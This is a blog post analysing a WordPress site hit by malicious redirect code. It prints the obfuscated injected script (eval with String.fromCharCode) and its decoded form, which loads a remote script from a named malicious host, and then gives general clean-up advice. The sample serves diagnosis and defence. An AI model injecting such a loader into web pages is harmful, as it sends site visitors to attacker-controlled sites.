
Yesterday in a group, I saw a webmaster asking about WordPressbuilt websitethat automatically redirects to someone else's site as soon as it's opened. Then Naiba visited the URL he privately messaged to take a look.
WordPress infected with malicious redirect code
When you open your own site, after most of the content loads, it automatically redirects to a third-party site, and it may redirect through several sites.
At the same time, the redirected site asks for notification permissions, as shown below:

Then I analyzed the site's source code (it had many plugins installed, resulting in a lot of messy JS and other code).
Eventually, I found the following code snippet suspicious. I asked the site owner, and it wasn't his own code nor from any of his installed plugins.
<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>
Then Naiba searched for this eval(String.fromCharCode and found the following record article
Then viajdstiles.comThis website explains the meaning of the code above.
var d=document;var s=d.createElement('script');
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}Parsing the numbers above again reveals the following website.
https://blackawardago.com
Regardless of the final URL, it's clear the site has been hacked.
This is known as WordPress malicious redirect code abroad, and it seems to have become popular since 2018. Below are two articles Naiba found while searching for information.
https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware
If you want to check if your website is also infected with this malicious redirect code, you can use the following website to inspect it.
WordPress Malicious Redirect Code Removal Methods
Of course, if infected with WordPress malicious redirect code, how can it be removed? (Since that site owner didn't ask for my help, Naiba hasn't encountered the actual code. Below are general handling methods shared.)
Solution for those who can understand code
- Find the malicious code and delete it.
- Check all website files and code to see if there are any other infections or unknown scripts, and delete them.
- Check if the database is infected; if so, delete the infected content.
Solution for those who cannot understand code
- Pay someone who understands code to clean it for you. I saw the foreign service above starts at $108/year.
- Delete the website and reinstall it, ensuring the use of secure themes and plugins, ensuring the database is not infected, and ensuring server security.
If any experts reading this article know how to clean such malicious code or have experience cleaning malicious code, please leave a comment to share.
Finally, recommend a plugin:Install a firewall for WordPress! Try Wordfence
Related knowledge:Implement Security Measures to Avoid WordPress Websites Being Hacked